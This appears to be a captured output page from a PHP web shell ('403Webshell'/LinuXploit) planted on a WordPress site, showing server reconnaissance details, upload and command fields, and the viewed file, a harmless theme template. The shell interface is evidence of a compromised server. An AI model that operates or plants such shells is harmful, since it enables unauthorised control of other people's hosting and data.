403Webshell
Server IP : 172.67.178.83  /  Your IP : 216.73.217.141
Web Server : Apache
System : Linux hosting01.arsenalhost.com 4.18.0-425.13.1.lve.el8.x86_64 #1 SMP Mon Feb 27 15:23:24 EST 2023 x86_64
User : corbizre ( 1013)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/corbizre/officespace4lease.com/wp-content/themes/sesame/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/corbizre/officespace4lease.com/wp-content/themes/sesame/entry.php
<?php
/**
 * A single post to be used in any post list loop.
 * @author Realtyna Inc.
 */
?>
<article id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
    <header>
        <?php if (is_singular()) {
            echo '<h1 class="entry-title">';
        } else {
            echo '<h2 class="entry-title">';
        } ?><a href="<?php echo esc_url(get_the_permalink()); ?>" title="<?php esc_attr(the_title_attribute()); ?>"
               rel="bookmark"><?php echo esc_html(get_the_title()); ?></a><?php if (is_singular()) {
            echo '</h1>';
        } else {
            echo '</h2>';
        } ?>
    </header>
    <?php echo wp_kses(get_the_post_thumbnail(), 'post'); ?>
    <?php
    $sesame_post_author = get_the_author();
    $sesame_post_author_link = get_author_posts_url( get_the_author_meta( 'ID' ), get_the_author_meta( 'user_nicename' ));
    $sesame_post_date = get_the_date();
    ?>
    <div class="re-author clearfix">
        <div class="avatar">
            <?php echo get_avatar( get_the_author_meta( 'email' ), '50' ); ?>
        </div>
        <div class="description">
            <div class="author-name">
                <span class=""><?php esc_html_e('By','sesame'); ?></span>
                <a href="<?php echo esc_attr($sesame_post_author_link); ?>" >
                    <?php echo esc_html($sesame_post_author); ?>
                </a>
            </div>
            <div><?php echo esc_html($sesame_post_date); ?></div>
        </div>
    </div>
    <?php the_excerpt();  ?>
    <?php if (!is_search()) get_template_part('entry-footer'); ?>
</article>


Youez - 2016 - github.com/yon3zu
LinuXploit